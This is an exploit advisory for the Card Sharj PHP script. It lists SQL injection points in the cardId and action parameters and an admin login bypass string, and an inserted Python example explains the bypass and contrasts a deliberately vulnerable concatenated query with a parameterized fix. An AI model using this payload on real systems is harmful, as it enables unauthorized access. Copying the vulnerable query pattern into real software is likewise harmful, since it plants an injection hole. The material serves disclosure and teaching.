Card Sharj suffers from a remote SQL injection vulnerability that allows for authentication bypass.
[+] Info=================================================================
[-] Exploit Title: Card sharj scripts Auth Bypass & Sqli Vulnerability
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org
[-] Version: 1.01
[-] Software Link: http://dl.xn--mgbguh09aqiwi.com/files/Card-sharj-scripts.rar
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 2011 / 09 / 16
[-] CVE : N/A
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili
[+] Exploit===============================================================
http://127.0.0.1/index.php?cardId=[sql inject]
http://127.0.0.1/index.php?action=[sql inject]
http://localhost/Card-sharj-scripts/admin/index.php
Username & Password: admin' or '1=1
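
Why the login string above is accepted, and the fix, as an added example (not code from Card Sharj or from the advisory's author). The script's real query and schema are not shown in the advisory, so the table, columns and function names below are assumptions, and Python's sqlite3 stands in for the PHP/database stack:

```python
import sqlite3

def make_db():
    # Constructed stand-in for the admin table (hypothetical schema).
    # Plaintext password only to keep the demo short; store a salted hash in practice.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: input is spliced into the SQL text, so a quote in
    the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Hardened pattern: values are bound as data and never parsed as SQL."""
    sql = "SELECT username FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def parse_card_id(raw):
    """Allow-list check for a numeric parameter such as cardId: reject
    anything that is not plain ASCII digits before it reaches a query."""
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("cardId must be a non-negative integer")
    return int(raw)

if __name__ == "__main__":
    db = make_db()
    s = "admin' or '1=1"  # the string given in the advisory
    # Concatenated, the WHERE clause becomes
    #   username = 'admin' or '1=1' AND password = 'admin' or '1=1'
    # and the first OR branch alone matches the admin row.
    print("concatenated :", login_concatenated(db, s, s))
    print("parameterized:", login_parameterized(db, s, s))
    print("cardId check :", parse_card_id("42"))
```

The same binding applies to the `cardId` and `action` parameters: bind them as query parameters, and validate `cardId` as an integer and `action` against a fixed list of known values.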
[+] Greets================================================================
Ter0R ~ Hurr!c4nE ~ Cru3l.b0y ~ M4hd1 ~ NoL1m1t ~ s3cure.p0rt ,r3v0lter
Skitt3r ~ cmaxx ~ SkilleR ~ p0w3rfu7 And All #BHG Members
h4ckcity.org , pentesters.ir, mn-team.net [PersianGulf F0r Ever]
<3 I Love You iRAN Far==>D <3
==========================================================================